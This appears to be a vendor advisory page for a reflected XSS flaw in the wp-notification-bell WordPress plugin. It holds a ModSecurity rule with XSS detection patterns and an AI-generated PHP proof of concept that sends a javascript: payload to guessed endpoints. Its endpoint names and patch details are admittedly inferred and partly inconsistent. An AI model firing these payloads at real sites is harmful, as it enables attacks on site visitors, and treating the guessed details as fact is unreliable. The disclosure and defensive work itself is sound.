What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based cross-site scripting (XSS) vulnerability found in the wp-notification-bell plugin for WordPress. It allows unauthenticated attackers to inject arbitrary web scripts via the ‘url’ parameter due to insufficient input sanitization and output escaping.

Who is affected by this vulnerability?

WordPress installations using the wp-notification-bell plugin versions up to 1.4.2 are affected by this vulnerability. Administrators should check their plugin version to determine if they need to take action.

How can I check if my site is vulnerable?

To check if your site is vulnerable, go to the WordPress admin dashboard, navigate to the Plugins section, and look for the wp-notification-bell plugin. If the version is 1.4.2 or lower, your site is at risk.

What are the potential impacts of this vulnerability?

If exploited, this vulnerability can allow attackers to execute arbitrary JavaScript in the context of the victim’s browser. This could lead to session hijacking, credential theft, or redirection to malicious sites.

How do I fix this vulnerability?

To remediate this vulnerability, update the wp-notification-bell plugin to version 1.4.3 or later, which includes fixes for the input sanitization and output escaping issues. Regularly updating all plugins is a good security practice.

What does the CVSS score of 6.1 indicate?

A CVSS score of 6.1 indicates a medium severity vulnerability. This means that while it is not the most critical threat, it still poses a significant risk and should be addressed promptly to prevent potential exploitation.

What is reflected DOM-based XSS?

Reflected DOM-based XSS occurs when an attacker is able to inject malicious scripts into a web page through user input that is reflected back to the user without proper sanitization. This type of attack typically requires the victim to click a specially crafted link.

How does the proof of concept demonstrate the vulnerability?

The proof of concept shows how an attacker can craft a malicious URL that exploits the vulnerability by sending a JavaScript payload through the ‘url’ parameter. It simulates an AJAX request to demonstrate how the XSS can be triggered.

What should I do if I cannot update the plugin?

If you cannot update the plugin immediately, consider disabling the wp-notification-bell plugin until a fix is applied. Additionally, review your site’s security settings and consider implementing a web application firewall.

How can I prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, regularly update all plugins and themes, conduct security audits, and ensure that all user input is properly sanitized and escaped. Educate users about the risks of clicking unknown links.

What is the role of input sanitization in preventing XSS?

Input sanitization involves cleaning user input to ensure it does not contain harmful scripts. Proper sanitization and escaping prevent malicious data from being executed in the browser, thereby protecting against XSS attacks.

What is the significance of the CWE-79 classification?

CWE-79 refers to improper neutralization of input during web page generation, which is a common cause of XSS vulnerabilities. This classification helps developers understand the nature of the vulnerability and the importance of secure coding practices.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 7, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (wp-notification-bell)

CVE ID CVE-2024-13362

Plugin wp-notification-bell

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 1.4.2

Patched Version —

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362 (metadata-based): This is a reflected DOM-based cross-site scripting (XSS) vulnerability in the wp-notification-bell plugin for WordPress, affecting versions up to 1.4.2. The vulnerability carries a CVSS score of 6.1 (medium severity) and allows unauthenticated attackers to inject arbitrary web scripts through the ‘url’ parameter.

Root Cause: Based on the CWE-79 classification and the description, the vulnerability stems from insufficient input sanitization and output escaping of the ‘url’ parameter. The plugin likely processes this parameter in a JavaScript context (DOM-based), meaning unsanitized user input is written directly into the DOM without proper escaping. This is inferred from the CWE and description; no source code is available for confirmation.

Exploitation: An unauthenticated attacker crafts a malicious URL containing a JavaScript payload in the ‘url’ parameter. The attack vector is likely via a plugin-specific endpoint or AJAX handler that reflects the parameter value into the page. The attacker must trick a victim into clicking the link. Based on the plugin slug ‘wp-notification-bell’, the vulnerable endpoint could be a frontend page or a dedicated AJAX action that processes notification-related requests. No specific endpoint is confirmed from the metadata.

Remediation: The fix requires proper sanitization of the ‘url’ parameter on input (e.g., using WordPress’s esc_url_raw for storage) and context-appropriate output escaping (e.g., using esc_url or wp_kses when rendering in HTML, or JavaScript-specific encoding for DOM contexts). The patched version 1.4.3 likely implements these measures.

Impact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim’s browser within the context of the WordPress site. This can lead to session hijacking, credential theft, defacement, or redirection to malicious sites. The attacker does not require authentication, and the scope changes (CVSS scope: changed) meaning the impact can extend beyond the vulnerable component.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_URI "@contains /wp-admin/admin-ajax.php" "id:20261948,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 - Reflected XSS via url parameter in wp-notification-bell plugin',severity:'CRITICAL',tag:'CVE-2024-13362'"
SecRule ARGS_POST:action "@rx ^wp_notification_bell_" "chain"
SecRule ARGS_POST:url "@rx (?i)(javascript:|<script|onload=|onerror=|alert)" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

// Assumptions based on metadata:
// - The plugin slug is 'wp-notification-bell'
// - The vulnerable parameter is 'url'
// - The endpoint is likely an AJAX action or a page that reflects the 'url' parameter
// - No specific endpoint is confirmed; we will test the most common pattern: admin-ajax.php with action parameter

$target_url = 'http://example.com'; // Change this to the target WordPress installation

// Craft a malicious payload that triggers XSS via the 'url' parameter
$payload = 'javascript:alert("XSS")';

// Attempt 1: AJAX endpoint (commonly used by plugins for frontend requests)
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$post_data = array(
    'action' => 'wp_notification_bell_fetch', // Assumed action name, may vary
    'url' => $payload
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'User-Agent: Atomic-Edge-PoC'
));
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "Attempt 1 - AJAX endpoint: HTTP $http_coden";
if (strpos($response, $payload) !== false) {
    echo "[+] Payload reflected in response - likely vulnerable!n";
} else {
    echo "[-] Payload not reflected in response or endpoint not found.n";
}

// Attempt 2: Direct plugin page (if the plugin has a frontend page)
$plugin_url = $target_url . '/?wp_notification_bell_page=1&url=' . urlencode($payload);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $plugin_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'User-Agent: Atomic-Edge-PoC'
));
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "Attempt 2 - Direct page: HTTP $http_coden";
if (strpos($response, $payload) !== false) {
    echo "[+] Payload reflected in response - likely vulnerable!n";
} else {
    echo "[-] Payload not reflected in response or endpoint not found.n";
}

?>

Frequently Asked Questions

What is CVE-2024-13362?
Understanding the vulnerability
CVE-2024-13362 is a reflected DOM-based cross-site scripting (XSS) vulnerability found in the wp-notification-bell plugin for WordPress. It allows unauthenticated attackers to inject arbitrary web scripts via the ‘url’ parameter due to insufficient input sanitization and output escaping.
Who is affected by this vulnerability?
Identifying at-risk users
WordPress installations using the wp-notification-bell plugin versions up to 1.4.2 are affected by this vulnerability. Administrators should check their plugin version to determine if they need to take action.
How can I check if my site is vulnerable?
Verifying plugin versions
To check if your site is vulnerable, go to the WordPress admin dashboard, navigate to the Plugins section, and look for the wp-notification-bell plugin. If the version is 1.4.2 or lower, your site is at risk.
What are the potential impacts of this vulnerability?
Understanding the risks
If exploited, this vulnerability can allow attackers to execute arbitrary JavaScript in the context of the victim’s browser. This could lead to session hijacking, credential theft, or redirection to malicious sites.
How do I fix this vulnerability?
Remediation steps
To remediate this vulnerability, update the wp-notification-bell plugin to version 1.4.3 or later, which includes fixes for the input sanitization and output escaping issues. Regularly updating all plugins is a good security practice.
What does the CVSS score of 6.1 indicate?
Understanding severity levels
A CVSS score of 6.1 indicates a medium severity vulnerability. This means that while it is not the most critical threat, it still poses a significant risk and should be addressed promptly to prevent potential exploitation.
What is reflected DOM-based XSS?
Explaining the attack vector
Reflected DOM-based XSS occurs when an attacker is able to inject malicious scripts into a web page through user input that is reflected back to the user without proper sanitization. This type of attack typically requires the victim to click a specially crafted link.
How does the proof of concept demonstrate the vulnerability?
Understanding the demonstration
The proof of concept shows how an attacker can craft a malicious URL that exploits the vulnerability by sending a JavaScript payload through the ‘url’ parameter. It simulates an AJAX request to demonstrate how the XSS can be triggered.
What should I do if I cannot update the plugin?
Mitigation alternatives
If you cannot update the plugin immediately, consider disabling the wp-notification-bell plugin until a fix is applied. Additionally, review your site’s security settings and consider implementing a web application firewall.
How can I prevent similar vulnerabilities in the future?
Best practices for security
To prevent similar vulnerabilities, regularly update all plugins and themes, conduct security audits, and ensure that all user input is properly sanitized and escaped. Educate users about the risks of clicking unknown links.
What is the role of input sanitization in preventing XSS?
Importance of sanitization
Input sanitization involves cleaning user input to ensure it does not contain harmful scripts. Proper sanitization and escaping prevent malicious data from being executed in the browser, thereby protecting against XSS attacks.
What is the significance of the CWE-79 classification?
Understanding the classification
CWE-79 refers to improper neutralization of input during web page generation, which is a common cause of XSS vulnerabilities. This classification helps developers understand the nature of the vulnerability and the importance of secure coding practices.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations